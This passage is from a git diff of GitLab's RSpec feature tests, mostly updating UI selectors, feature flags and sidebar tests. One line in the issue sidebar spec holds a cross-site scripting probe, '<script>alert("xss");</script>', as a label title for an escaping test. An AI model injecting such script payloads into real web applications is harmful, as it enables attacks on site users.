one as filter', :aggregate_failures do + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 2) + + expect_filtered_search_dropdown_results(filter_dropdown, 2) + + filter_dropdown.click_on 'Yes' + filter_submit.click + + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 1) + expect(find('.board-card')).to have_content(issue_2.title) + end + end + + describe 'filters by milestone' do + before do + set_filter('milestone') + end + + it 'loads all the milestones when opened and submit one as filter', :aggregate_failures do + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 2) + + expect_filtered_search_dropdown_results(filter_dropdown, 6) + expect(filter_dropdown).to have_content('None') + expect(filter_dropdown).to have_content('Any') + expect(filter_dropdown).to have_content('Started') + expect(filter_dropdown).to have_content('Upcoming') + expect(filter_dropdown).to have_content(milestone_1.title) + expect(filter_dropdown).to have_content(milestone_2.title) + + click_on milestone_1.title + filter_submit.click + + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 1) + end + end + + describe 'filters by reaction emoji' do + before do + set_filter('my-reaction') + end + + it 'loads all the emojis when opened and submit one as filter', :aggregate_failures do + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 2) + + expect_filtered_search_dropdown_results(filter_dropdown, 3) + + click_on 'thumbsup' + filter_submit.click + + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 1) + expect(find('.board-card')).to have_content(issue_1.title) + end + end + + describe 'filters by type' do + let_it_be(:incident) { create(:incident, project: project)} + + before do + set_filter('type') + end + + it 'loads all the types when opened and submit one as filter', :aggregate_failures do + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 3) + + expect_filtered_search_dropdown_results(filter_dropdown, 2) + + click_on 'Incident' + filter_submit.click + + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 1) + expect(find('.board-card')).to have_content(incident.title) + end + end + + def set_filter(filter) + filter_input.click + filter_input.set("#{filter}:") + filter_first_suggestion.click # Select `=` operator + end + + def expect_filtered_search_dropdown_results(filter_dropdown, count) + expect(filter_dropdown).to have_selector('.gl-new-dropdown-item', count: count) + end + + def visit_project_board + visit project_board_path(project, board) + wait_for_requests + end +end diff --git a/spec/features/boards/sidebar_due_date_spec.rb b/spec/features/boards/sidebar_due_date_spec.rb deleted file mode 100644 index 141c574ffec..00000000000 --- a/spec/features/boards/sidebar_due_date_spec.rb +++ /dev/null @@ -1,46 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe 'Project issue boards sidebar due date', :js do - include BoardHelpers - - let_it_be(:user) { create(:user) } - let_it_be(:project) { create(:project, :public) } - let_it_be(:issue) { create(:issue, project: project, relative_position: 1) } - let_it_be(:board) { create(:board, project: project) } - let_it_be(:list) { create(:list, board: board, position: 0) } - - let(:card) { find('.board:nth-child(1)').first('.board-card') } - - around do |example| - freeze_time { example.run } - end - - before do - project.add_maintainer(user) - - sign_in(user) - - visit project_board_path(project, board) - wait_for_requests - end - - context 'due date' do - it 'updates due date' do - click_card(card) - - page.within('[data-testid="sidebar-due-date"]') do - today = Date.today.day - - click_button 'Edit' - - click_button today.to_s - - wait_for_requests - - expect(page).to have_content(today.to_s(:medium)) - end - end - end -end diff --git a/spec/features/boards/sidebar_milestones_spec.rb b/spec/features/boards/sidebar_milestones_spec.rb deleted file mode 100644 index be7435263b1..00000000000 --- a/spec/features/boards/sidebar_milestones_spec.rb +++ /dev/null @@ -1,65 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe 'Project issue boards sidebar milestones', :js do - include BoardHelpers - - let_it_be(:user) { create(:user) } - let_it_be(:project) { create(:project, :public) } - let_it_be(:milestone) { create(:milestone, project: project) } - let_it_be(:issue1) { create(:issue, project: project, relative_position: 1) } - let_it_be(:issue2) { create(:issue, project: project, milestone: milestone, relative_position: 2) } - let_it_be(:board) { create(:board, project: project) } - let_it_be(:list) { create(:list, board: board, position: 0) } - - let(:card1) { find('.board:nth-child(1) .board-card:nth-of-type(1)') } - let(:card2) { find('.board:nth-child(1) .board-card:nth-of-type(2)') } - - before do - project.add_maintainer(user) - - sign_in(user) - - visit project_board_path(project, board) - wait_for_requests - end - - context 'milestone' do - it 'adds a milestone' do - click_card(card1) - - page.within('[data-testid="sidebar-milestones"]') do - click_button 'Edit' - - wait_for_requests - - click_button milestone.title - - wait_for_requests - - page.within('[data-testid="select-milestone"]') do - expect(page).to have_content(milestone.title) - end - end - end - - it 'removes a milestone' do - click_card(card2) - - page.within('[data-testid="sidebar-milestones"]') do - click_button 'Edit' - - wait_for_requests - - click_button "No milestone" - - wait_for_requests - - page.within('[data-testid="select-milestone"]') do - expect(page).not_to have_content(milestone.title) - end - end - end - end -end diff --git a/spec/features/clusters/create_agent_spec.rb b/spec/features/clusters/create_agent_spec.rb index f40932c4750..7ed31a8c549 100644 --- a/spec/features/clusters/create_agent_spec.rb +++ b/spec/features/clusters/create_agent_spec.rb @@ -25,13 +25,13 @@ RSpec.describe 'Cluster agent registration', :js do it 'allows the user to select an agent to install, and displays the resulting agent token' do click_button('Actions') - expect(page).to have_content('Install new Agent') + expect(page).to have_content('Register') - click_button('Select an Agent') + click_button('Select an agent') click_button('example-agent-2') - click_button('Register Agent') + click_button('Register') - expect(page).to have_content('The token value will not be shown again after you close this window.') + expect(page).to have_content('You cannot see this token again after you close this window.') expect(page).to have_content('example-agent-token') expect(page).to have_content('docker run --pull=always --rm') diff --git a/spec/features/commits_spec.rb b/spec/features/commits_spec.rb index 2dafaedd262..4378e88f7c1 100644 --- a/spec/features/commits_spec.rb +++ b/spec/features/commits_spec.rb @@ -24,14 +24,15 @@ RSpec.describe 'Commits' do end context 'commit status is Generic Commit Status' do - let!(:status) { create(:generic_commit_status, pipeline: pipeline) } + let!(:status) { create(:generic_commit_status, pipeline: pipeline, ref: pipeline.ref) } before do project.add_reporter(user) end - describe 'Commit builds' do + describe 'Commit builds with jobs_tab_feature flag off' do before do + stub_feature_flags(jobs_tab_vue: false) visit pipeline_path(pipeline) end @@ -89,8 +90,9 @@ RSpec.describe 'Commits' do end end - context 'Download artifacts' do + context 'Download artifacts with jobs_tab_vue feature flag off' do before do + stub_feature_flags(jobs_tab_vue: false) create(:ci_job_artifact, :archive, file: artifacts_file, job: build) end @@ -118,8 +120,9 @@ RSpec.describe 'Commits' do end end - context "when logged as reporter" do + context "when logged as reporter and with jobs_tab_vue feature flag off" do before do + stub_feature_flags(jobs_tab_vue: false) project.add_reporter(user) create(:ci_job_artifact, :archive, file: artifacts_file, job: build) visit pipeline_path(pipeline) diff --git a/spec/features/dashboard/issues_spec.rb b/spec/features/dashboard/issues_spec.rb index 0b2811618b5..a9fb6a2ae7e 100644 --- a/spec/features/dashboard/issues_spec.rb +++ b/spec/features/dashboard/issues_spec.rb @@ -49,7 +49,7 @@ RSpec.describe 'Dashboard Issues' do describe 'new issue dropdown' do it 'shows projects only with issues feature enabled', :js do - find('.new-project-item-select-button').click + click_button 'Toggle project select' page.within('.select2-results') do expect(page).to have_content(project.full_name) @@ -58,7 +58,7 @@ RSpec.describe 'Dashboard Issues' do end it 'shows the new issue page', :js do - find('.new-project-item-select-button').click + click_button 'Toggle project select' wait_for_requests diff --git a/spec/features/dashboard/merge_requests_spec.rb b/spec/features/dashboard/merge_requests_spec.rb index aa2485d4236..6239702edde 100644 --- a/spec/features/dashboard/merge_requests_spec.rb +++ b/spec/features/dashboard/merge_requests_spec.rb @@ -34,7 +34,7 @@ RSpec.describe 'Dashboard Merge Requests' do end it 'shows projects only with merge requests feature enabled', :js do - find('.new-project-item-select-button').click + click_button 'Toggle project select' page.within('.select2-results') do expect(page).to have_content(project.full_name) diff --git a/spec/features/dashboard/milestones_spec.rb b/spec/features/dashboard/milestones_spec.rb index 992ed2f2ce6..1ba16bf879a 100644 --- a/spec/features/dashboard/milestones_spec.rb +++ b/spec/features/dashboard/milestones_spec.rb @@ -35,7 +35,7 @@ RSpec.describe 'Dashboard > Milestones' do describe 'new milestones dropdown', :js do it 'takes user to a new milestone page', :js do - find('.new-project-item-select-button').click + click_button 'Toggle project select' page.within('.select2-results') do first('.select2-result-label').click diff --git a/spec/features/dashboard/root_spec.rb b/spec/features/dashboard/root_spec.rb deleted file mode 100644 index 55bb43c6fcf..00000000000 --- a/spec/features/dashboard/root_spec.rb +++ /dev/null @@ -1,19 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe 'Root path' do - let_it_be(:user) { create(:user) } - let_it_be(:project) { create(:project) } - - before do - project.add_developer(user) - sign_in(user) - end - - it 'shows the customize banner', :js do - visit root_path - - expect(page).to have_content('Do you want to customize this page?') - end -end diff --git a/spec/features/expand_collapse_diffs_spec.rb b/spec/features/expand_collapse_diffs_spec.rb index add4af2bcdb..63e16946a0b 100644 --- a/spec/features/expand_collapse_diffs_spec.rb +++ b/spec/features/expand_collapse_diffs_spec.rb @@ -7,7 +7,6 @@ RSpec.describe 'Expand and collapse diffs', :js do let(:project) { create(:project, :repository) } before do - stub_feature_flags(increased_diff_limits: false) allow(Gitlab::CurrentSettings).to receive(:diff_max_patch_bytes).and_return(100.kilobytes) admin = create(:admin) diff --git a/spec/features/gitlab_experiments_spec.rb b/spec/features/gitlab_experiments_spec.rb index 76b418adcea..ca772680ff6 100644 --- a/spec/features/gitlab_experiments_spec.rb +++ b/spec/features/gitlab_experiments_spec.rb @@ -31,9 +31,10 @@ RSpec.describe "Gitlab::Experiment", :js do expect(page).to have_content('Abuse Reports') - published_experiments = page.evaluate_script('window.gon.experiment') + published_experiments = page.evaluate_script('window.gl.experiments') expect(published_experiments).to include({ 'null_hypothesis' => { + 'excluded' => false, 'experiment' => 'null_hypothesis', 'key' => anything, 'variant' => 'candidate' diff --git a/spec/features/global_search_spec.rb b/spec/features/global_search_spec.rb index a380edff3a4..0397e72502a 100644 --- a/spec/features/global_search_spec.rb +++ b/spec/features/global_search_spec.rb @@ -57,6 +57,14 @@ RSpec.describe 'Global search' do expect(page).to have_selector('.search-form') expect(page).to have_no_selector('#js-header-search') end + + it 'focuses search input when shortcut "s" is pressed', :js do + expect(page).not_to have_selector('#search:focus') + + find('body').native.send_key('s') + + expect(page).to have_selector('#search:focus') + end end describe 'when new_header_search feature is enabled' do @@ -70,5 +78,13 @@ RSpec.describe 'Global search' do expect(page).to have_no_selector('.search-form') expect(page).to have_selector('#js-header-search') end + + it 'focuses search input when shortcut "s" is pressed', :js do + expect(page).not_to have_selector('#search:focus') + + find('body').native.send_key('s') + + expect(page).to have_selector('#search:focus') + end end end diff --git a/spec/features/groups/container_registry_spec.rb b/spec/features/groups/container_registry_spec.rb index 098559dc3f8..f5af9ba8b7b 100644 --- a/spec/features/groups/container_registry_spec.rb +++ b/spec/features/groups/container_registry_spec.rb @@ -82,7 +82,7 @@ RSpec.describe 'Container Registry', :js do end it 'shows the image tags' do - expect(page).to have_content 'Image tags' + expect(page).to have_content '1 tag' first_tag = first('[data-testid="name"]') expect(first_tag).to have_content 'latest' end diff --git a/spec/features/groups/empty_states_spec.rb b/spec/features/groups/empty_states_spec.rb index 4488f53a03f..0317f9162cc 100644 --- a/spec/features/groups/empty_states_spec.rb +++ b/spec/features/groups/empty_states_spec.rb @@ -101,7 +101,7 @@ RSpec.describe 'Group empty states' do it "the new #{issuable_name} button opens a project dropdown" do within '.empty-state' do - find('.new-project-item-select-button').click + click_button 'Toggle project select' end expect(page).to have_selector('.ajax-project-dropdown') diff --git a/spec/features/groups/issues_spec.rb b/spec/features/groups/issues_spec.rb index 4e59ab40d04..1bac1bcdf5a 100644 --- a/spec/features/groups/issues_spec.rb +++ b/spec/features/groups/issues_spec.rb @@ -119,8 +119,9 @@ RSpec.describe 'Group issues page' do end it 'shows projects only with issues feature enabled', :js do - find('.empty-state .js-lazy-loaded') - find('.empty-state .new-project-item-link').click + within '.empty-state' do + click_button 'Toggle project select' + end page.within('.select2-results') do expect(page).to have_content(project.full_name) @@ -158,9 +159,7 @@ RSpec.describe 'Group issues page' do it 'each issue item has a user-can-drag css applied' do visit issues_group_path(group, sort: 'relative_position') - page.within('.manual-ordering') do - expect(page).to have_selector('.issue.user-can-drag', count: 3) - end + expect(page).to have_selector('.issue.user-can-drag', count: 3) end it 'issues should be draggable and persist order' do @@ -224,7 +223,8 @@ RSpec.describe 'Group issues page' do end it 'shows the pagination' do - expect(page).to have_selector('.gl-pagination') + expect(page).to have_link 'Prev' + expect(page).to have_link 'Next' end it 'first pagination item is active' do diff --git a/spec/features/groups/members/manage_groups_spec.rb b/spec/features/groups/members/manage_groups_spec.rb index d822a5ea871..2beecda23b5 100644 --- a/spec/features/groups/members/manage_groups_spec.rb +++ b/spec/features/groups/members/manage_groups_spec.rb @@ -6,6 +6,7 @@ RSpec.describe 'Groups > Members > Manage groups', :js do include Select2Helper include Spec::Support::Helpers::Features::MembersHelpers include Spec::Support::Helpers::Features::InviteMembersModalHelper + include Spec::Support::Helpers::ModalHelpers let_it_be(:user) { create(:user) } @@ -92,7 +93,7 @@ RSpec.describe 'Groups > Members > Manage groups', :js do click_button 'Remove group' end - page.within('[role="dialog"]') do + within_modal do click_button('Remove group') end diff --git a/spec/features/groups/members/manage_members_spec.rb b/spec/features/groups/members/manage_members_spec.rb index 38e829bafcc..0ce50107e54 100644 --- a/spec/features/groups/members/manage_members_spec.rb +++ b/spec/features/groups/members/manage_members_spec.rb @@ -5,6 +5,7 @@ require 'spec_helper' RSpec.describe 'Groups > Members > Manage members' do include Spec::Support::Helpers::Features::MembersHelpers include Spec::Support::Helpers::Features::InviteMembersModalHelper + include Spec::Support::Helpers::ModalHelpers let_it_be(:user1) { create(:user, name: 'John Doe') } let_it_be(:user2) { create(:user, name: 'Mary Jane') } @@ -84,33 +85,6 @@ RSpec.describe 'Groups > Members > Manage members' do property: 'existing_user', user: user1 ) - expect_no_snowplow_event( - category: 'Members::CreateService', - action: 'area_of_focus' - ) - end - - it 'adds a user to group with area_of_focus', :js, :snowplow, :aggregate_failures do - stub_experiments(member_areas_of_focus: :candidate) - group.add_owner(user1) - - visit group_group_members_path(group) - - invite_member(user2.name, role: 'Reporter', area_of_focus: true) - wait_for_requests - - expect_snowplow_event( - category: 'Members::CreateService', - action: 'area_of_focus', - label: 'Contribute to the codebase', - property: group.members.last.id.to_s - ) - expect_snowplow_event( - category: 'Members::CreateService', - action: 'area_of_focus', - label: 'Collaborate on open issues and merge requests', - property: group.members.last.id.to_s - ) end it 'do not disclose email addresses', :js do @@ -170,7 +144,7 @@ RSpec.describe 'Groups > Members > Manage members' do click_button 'Remove member' end - page.within('[role="dialog"]') do + within_modal do expect(page).to have_unchecked_field 'Also unassign this user from related issues and merge requests' click_button('Remove member') end @@ -220,36 +194,9 @@ RSpec.describe 'Groups > Members > Manage members' do property: 'net_new_user', user: user1 ) - expect_no_snowplow_event( - category: 'Members::CreateService', - action: 'area_of_focus' - ) end end - it 'invite user to group with area_of_focus', :js, :snowplow, :aggregate_failures do - stub_experiments(member_areas_of_focus: :candidate) - group.add_owner(user1) - - visit group_group_members_path(group) - - invite_member('test@example.com', role: 'Reporter', area_of_focus: true) - wait_for_requests - - expect_snowplow_event( - category: 'Members::InviteService', - action: 'area_of_focus', - label: 'Contribute to the codebase', - property: group.members.last.id.to_s - ) - expect_snowplow_event( - category: 'Members::InviteService', - action: 'area_of_focus', - label: 'Collaborate on open issues and merge requests', - property: group.members.last.id.to_s - ) - end - context 'when user is a guest' do before do group.add_guest(user1) diff --git a/spec/features/groups/navbar_spec.rb b/spec/features/groups/navbar_spec.rb index 22409e9e7f6..da8032dc4dd 100644 --- a/spec/features/groups/navbar_spec.rb +++ b/spec/features/groups/navbar_spec.rb @@ -14,7 +14,6 @@ RSpec.describe 'Group navbar' do before do insert_package_nav(_('Kubernetes')) - stub_feature_flags(group_iterations: false) stub_feature_flags(customer_relations: false) stub_config(dependency_proxy: { enabled: false }) stub_config(registry: { enabled: false }) diff --git a/spec/features/help_pages_spec.rb b/spec/features/help_pages_spec.rb index 66ba4dc987c..a1e2990202c 100644 --- a/spec/features/help_pages_spec.rb +++ b/spec/features/help_pages_spec.rb @@ -33,7 +33,7 @@ RSpec.describe 'Help Pages' do stub_application_setting(version_check_enabled: true) stub_rails_env('production') - allow(VersionCheck).to receive(:url).and_return('/version-check-url') + allow(VersionCheck).to receive(:image_url).and_return('/version-check-url') sign_in(create(:user)) visit help_path diff --git a/spec/features/ide/clientside_preview_csp_spec.rb b/spec/features/ide/clientside_preview_csp_spec.rb index 559edb8bf53..849fdb0a44c 100644 --- a/spec/features/ide/clientside_preview_csp_spec.rb +++ b/spec/features/ide/clientside_preview_csp_spec.rb @@ -12,7 +12,7 @@ RSpec.describe 'IDE Clientside Preview CSP' do end it_behaves_like 'setting CSP', 'frame-src' do - let(:whitelisted_url) { 'https://sandbox.gitlab-static.test' } + let(:allowlisted_url) { 'https://sandbox.gitlab-static.test' } let(:extended_controller_class) { IdeController } subject do @@ -23,7 +23,7 @@ RSpec.describe 'IDE Clientside Preview CSP' do before do stub_application_setting(web_ide_clientside_preview_enabled: true) - stub_application_setting(web_ide_clientside_preview_bundler_url: whitelisted_url) + stub_application_setting(web_ide_clientside_preview_bundler_url: allowlisted_url) sign_in(user) end diff --git a/spec/features/ide/static_object_external_storage_csp_spec.rb b/spec/features/ide/static_object_external_storage_csp_spec.rb index 24d37f25739..421b5db0dbb 100644 --- a/spec/features/ide/static_object_external_storage_csp_spec.rb +++ b/spec/features/ide/static_object_external_storage_csp_spec.rb @@ -12,7 +12,7 @@ RSpec.describe 'Static Object External Storage Content Security Policy' do end it_behaves_like 'setting CSP', 'connect-src' do - let_it_be(:whitelisted_url) { 'https://static-objects.test' } + let_it_be(:allowlisted_url) { 'https://static-objects.test' } let_it_be(:extended_controller_class) { IdeController } subject do @@ -22,7 +22,7 @@ RSpec.describe 'Static Object External Storage Content Security Policy' do end before do - allow_any_instance_of(ApplicationSetting).to receive(:static_objects_external_storage_url).and_return(whitelisted_url) + allow_any_instance_of(ApplicationSetting).to receive(:static_objects_external_storage_url).and_return(allowlisted_url) allow_any_instance_of(ApplicationSetting).to receive(:static_objects_external_storage_auth_token).and_return('letmein') sign_in(user) diff --git a/spec/features/invites_spec.rb b/spec/features/invites_spec.rb index f9ab780d2d6..9cb9416e7a0 100644 --- a/spec/features/invites_spec.rb +++ b/spec/features/invites_spec.rb @@ -226,34 +226,6 @@ RSpec.describe 'Group or Project invitations', :aggregate_failures do end end - context 'with invite email acceptance for the invite_email_preview_text experiment', :experiment do - let(:extra_params) do - { invite_type: Emails::Members::INITIAL_INVITE, experiment_name: 'invite_email_preview_text' } - end - - it 'tracks the accepted invite' do - expect(experiment(:invite_email_preview_text)).to track(:accepted) - .with_context(actor: group_invite) - .on_next_instance - - fill_in_sign_up_form(new_user) - end - end - - context 'with invite email acceptance for the invite_email_from experiment', :experiment do - let(:extra_params) do - { invite_type: Emails::Members::INITIAL_INVITE, experiment_name: 'invite_email_from' } - end - - it 'tracks the accepted invite' do - expect(experiment(:invite_email_from)).to track(:accepted) - .with_context(actor: group_invite) - .on_next_instance - - fill_in_sign_up_form(new_user) - end - end - it 'signs up and redirects to the group activity page with all the project/groups invitation automatically accepted' do fill_in_sign_up_form(new_user) fill_in_welcome_form diff --git a/spec/features/issuables/shortcuts_issuable_spec.rb b/spec/features/issuables/shortcuts_issuable_spec.rb index 78cd8d0bef3..7e8f39c47a7 100644 --- a/spec/features/issuables/shortcuts_issuable_spec.rb +++ b/spec/features/issuables/shortcuts_issuable_spec.rb @@ -44,4 +44,90 @@ RSpec.describe 'Blob shortcuts', :js do include_examples 'quotes the selected text' end end + + shared_examples "opens assignee dropdown for editing" do + it "opens assignee dropdown for editing" do + find('body').native.send_key('a') + + expect(find('.block.assignee')).to have_selector('.js-sidebar-assignee-data') + end + end + + describe 'pressing "a"' do + describe 'On an Issue' do + before do + stub_feature_flags(issue_assignees_widget: false) + visit project_issue_path(project, issue) + wait_for_requests + end + + include_examples 'opens assignee dropdown for editing' + end + + describe 'On a Merge Request' do + before do + stub_feature_flags(issue_assignees_widget: false) + visit project_merge_request_path(project, merge_request) + wait_for_requests + end + + include_examples 'opens assignee dropdown for editing' + end + end + + shared_examples "opens milestones dropdown for editing" do + it "opens milestones dropdown for editing" do + find('body').native.send_key('m') + + expect(find('[data-testid="milestone-edit"]')).to have_selector('.gl-new-dropdown-inner') + end + end + + describe 'pressing "m"' do + describe 'On an Issue' do + before do + visit project_issue_path(project, issue) + wait_for_requests + end + + include_examples 'opens milestones dropdown for editing' + end + + describe 'On a Merge Request' do + before do + visit project_merge_request_path(project, merge_request) + wait_for_requests + end + + include_examples 'opens milestones dropdown for editing' + end + end + + shared_examples "opens labels dropdown for editing" do + it "opens labels dropdown for editing" do + find('body').native.send_key('l') + + expect(find('.js-labels-block')).to have_selector('[data-testid="labels-select-dropdown-contents"]') + end + end + + describe 'pressing "l"' do + describe 'On an Issue' do + before do + visit project_issue_path(project, issue) + wait_for_requests + end + + include_examples 'opens labels dropdown for editing' + end + + describe 'On a Merge Request' do + before do + visit project_merge_request_path(project, merge_request) + wait_for_requests + end + + include_examples 'opens labels dropdown for editing' + end + end end diff --git a/spec/features/issuables/sorting_list_spec.rb b/spec/features/issuables/sorting_list_spec.rb index 6e07c6ffed2..f646cdbd71b 100644 --- a/spec/features/issuables/sorting_list_spec.rb +++ b/spec/features/issuables/sorting_list_spec.rb @@ -197,17 +197,13 @@ RSpec.describe 'Sort Issuable List' do click_button('Created date') click_on('Last updated') - wait_for_requests - - expect(first_issue).to include(last_updated_issuable.title) - expect(last_issue).to include(first_updated_issuable.title) + expect(page).to have_css('.issue:first-child', text: last_updated_issuable.title) + expect(page).to have_css('.issue:last-child', text: first_updated_issuable.title) click_on 'Sort direction' - wait_for_requests - - expect(first_issue).to include(first_updated_issuable.title) - expect(last_issue).to include(last_updated_issuable.title) + expect(page).to have_css('.issue:first-child', text: first_updated_issuable.title) + expect(page).to have_css('.issue:last-child', text: last_updated_issuable.title) end end end diff --git a/spec/features/issues/csv_spec.rb b/spec/features/issues/csv_spec.rb index b4c737495b4..9fd171bf44b 100644 --- a/spec/features/issues/csv_spec.rb +++ b/spec/features/issues/csv_spec.rb @@ -47,13 +47,13 @@ RSpec.describe 'Issues csv', :js do expect(page).to have_content "emailed to #{user.notification_email_or_default}" end - it 'includes a csv attachment', :sidekiq_might_not_need_inline do + it 'includes a csv attachment', :sidekiq_inline do request_csv expect(attachment.content_type).to include('text/csv') end - it 'ignores pagination', :sidekiq_might_not_need_inline do + it 'ignores pagination', :sidekiq_inline do create_list(:issue, 30, project: project, author: user) request_csv @@ -61,13 +61,13 @@ RSpec.describe 'Issues csv', :js do expect(csv.count).to eq 31 end - it 'uses filters from issue index', :sidekiq_might_not_need_inline do + it 'uses filters from issue index', :sidekiq_inline do request_csv(state: :closed) expect(csv.count).to eq 0 end - it 'ignores sorting from issue index', :sidekiq_might_not_need_inline do + it 'ignores sorting from issue index', :sidekiq_inline do issue2 = create(:labeled_issue, project: project, author: user, labels: [feature_label]) request_csv(sort: :label_priority) @@ -76,23 +76,11 @@ RSpec.describe 'Issues csv', :js do expect(csv.map { |row| row['Issue ID'] }).to eq expected end - it 'uses array filters, such as label_name', :sidekiq_might_not_need_inline do + it 'uses array filters, such as label_name', :sidekiq_inline do issue.update!(labels: [idea_label]) request_csv("label_name[]" => 'Bug') expect(csv.count).to eq 0 end - - it 'avoids excessive database calls' do - control_count = ActiveRecord::QueryRecorder.new { request_csv }.count - create_list(:labeled_issue, - 10, - project: project, - assignees: [user], - author: user, - milestone: milestone, - labels: [feature_label, idea_label]) - expect { request_csv }.not_to exceed_query_limit(control_count + 5) - end end diff --git a/spec/features/issues/gfm_autocomplete_spec.rb b/spec/features/issues/gfm_autocomplete_spec.rb index 0cefbae4d37..b0e4729db8b 100644 --- a/spec/features/issues/gfm_autocomplete_spec.rb +++ b/spec/features/issues/gfm_autocomplete_spec.rb @@ -180,7 +180,7 @@ RSpec.describe 'GFM autocomplete', :js do describe 'assignees' do it 'does not wrap with quotes for assignee values' do - fill_in 'Comment', with: "@#{user.username[0]}" + fill_in 'Comment', with: "@#{user.username}" find_highlighted_autocomplete_item.click diff --git a/spec/features/issues/issue_header_spec.rb b/spec/features/issues/issue_header_spec.rb index cf375d8fb67..3e27ce81860 100644 --- a/spec/features/issues/issue_header_spec.rb +++ b/spec/features/issues/issue_header_spec.rb @@ -4,7 +4,8 @@ require 'spec_helper' RSpec.describe 'issue header', :js do let_it_be(:user) { create(:user) } - let_it_be(:project) { create(:project) } + let_it_be(:group) { create(:group) } + let_it_be(:project) { create(:project, group: group) } let_it_be(:issue) { create(:issue, project: project) } let_it_be(:closed_issue) { create(:issue, :closed, project: project) } let_it_be(:closed_locked_issue) { create(:issue, :closed, :locked, project: project) } @@ -12,7 +13,7 @@ RSpec.describe 'issue header', :js do context 'when user has permission to update' do before do - project.add_maintainer(user) + group.add_owner(user) sign_in(user) end @@ -24,9 +25,10 @@ RSpec.describe 'issue header', :js do click_button 'Issue actions' end - it 'only shows the "New issue" and "Report abuse" items', :aggregate_failures do + it 'shows the "New issue", "Report abuse", and "Delete issue" items', :aggregate_failures do expect(page).to have_link 'New issue' expect(page).to have_link 'Report abuse' + expect(page).to have_button 'Delete issue' expect(page).not_to have_link 'Submit as spam' end end @@ -116,6 +118,7 @@ RSpec.describe 'issue header', :js do expect(page).to have_link 'New issue' expect(page).to have_link 'Report abuse' expect(page).not_to have_link 'Submit as spam' + expect(page).not_to have_button 'Delete issue' end end diff --git a/spec/features/issues/issue_sidebar_spec.rb b/spec/features/issues/issue_sidebar_spec.rb index bd4be755a92..9da6694c681 100644 --- a/spec/features/issues/issue_sidebar_spec.rb +++ b/spec/features/issues/issue_sidebar_spec.rb @@ -11,7 +11,6 @@ RSpec.describe 'Issue Sidebar' do let_it_be(:label) { create(:label, project: project, title: 'bug') } let_it_be(:issue) { create(:labeled_issue, project: project, labels: [label]) } let_it_be(:mock_date) { Date.today.at_beginning_of_month + 2.days } - let_it_be(:issue_with_due_date) { create(:issue, project: project, due_date: mock_date) } let_it_be(:xss_label) { create(:label, project: project, title: '<script>alert("xss");</script>') } before do @@ -201,30 +200,6 @@ RSpec.describe 'Issue Sidebar' do end end - context 'due date widget', :js do - let(:due_date_value) { find('[data-testid="due-date"] [data-testid="sidebar-date-value"]') } - - context 'when no due date exists' do - before do - visit_issue(project, issue) - end - - it "displays 'None'" do - expect(due_date_value.text).to have_content 'None' - end - end - - context 'when due date exists' do - before do - visit_issue(project, issue_with_due_date) - end - - it "displays the due date" do - expect(due_date_value.text).to have_content mock_date.strftime('%b %-d, %Y') - end - end - end - context 'as an allowed user' do before do project.add_developer(user) @@ -259,37 +234,11 @@ RSpec.describe 'Issue Sidebar' do end context 'editing issue milestone', :js do - let_it_be(:milestone_expired) { create(:milestone, project: project, title: 'Foo - expired', due_date: 5.days.ago) } - let_it_be(:milestone_no_duedate) { create(:milestone, project: project, title: 'Foo - No due date') } - let_it_be(:milestone1) { create(:milestone, project: project, title: 'Milestone-1', due_date: 20.days.from_now) } - let_it_be(:milestone2) { create(:milestone, project: project, title: 'Milestone-2', due_date: 15.days.from_now) } - let_it_be(:milestone3) { create(:milestone, project: project, title: 'Milestone-3', due_date: 10.days.from_now) } - - before do - page.within('.block.milestone') do - click_button 'Edit' - end - - wait_for_all_requests - end - - it 'shows milestones list in the dropdown' do - page.within('.block.milestone') do - # 5 milestones + "No milestone" = 6 items - expect(page.find('.gl-new-dropdown-contents')).to have_selector('li.gl-new-dropdown-item', count: 6) - end - end - - it 'shows expired milestone at the bottom of the list and milestone due earliest at the top of the list', :aggregate_failures do - page.within('.block.milestone .gl-new-dropdown-contents') do - expect(page.find('li:last-child')).to have_content milestone_expired.title + it_behaves_like 'milestone sidebar widget' + end - expect(page.all('li.gl-new-dropdown-item')[1]).to have_content milestone3.title - expect(page.all('li.gl-new-dropdown-item')[2]).to have_content milestone2.title - expect(page.all('li.gl-new-dropdown-item')[3]).to have_content milestone1.title - expect(page.all('li.gl-new-dropdown-item')[4]).to have_content milestone_no_duedate.title - end - end + context 'editing issue due date', :js do + it_behaves_like 'date sidebar widget' end context 'editing issue labels', :js do diff --git a/spec/features/issues/user_bulk_edits_issues_labels_spec.rb b/spec/features/issues/user_bulk_edits_issues_labels_spec.rb index 97df2d0208b..71213fb661f 100644 --- a/spec/features/issues/user_bulk_edits_issues_labels_spec.rb +++ b/spec/features/issues/user_bulk_edits_issues_labels_spec.rb @@ -12,6 +12,9 @@ RSpec.describe 'Issues > Labels bulk assignment' do let!(:issue1) { create(:issue, project: project, title: "Issue 1", labels: [frontend]) } let!(:issue2) { create(:issue, project: project, title: "Issue 2") } + let(:issue_1_selector) { "#issue_#{issue1.id}" } + let(:issue_2_selector) { "#issue_#{issue2.id}" } + context 'as an allowed user', :js do before do project.add_maintainer(user) @@ -44,10 +47,10 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it do - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).to have_content 'frontend' - expect(find("#issue_#{issue2.id}")).to have_content 'bug' - expect(find("#issue_#{issue2.id}")).not_to have_content 'frontend' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'frontend' + expect(find(issue_2_selector)).to have_content 'bug' + expect(find(issue_2_selector)).not_to have_content 'frontend' end end @@ -60,10 +63,10 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it do - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).to have_content 'frontend' - expect(find("#issue_#{issue2.id}")).to have_content 'bug' - expect(find("#issue_#{issue2.id}")).not_to have_content 'frontend' + 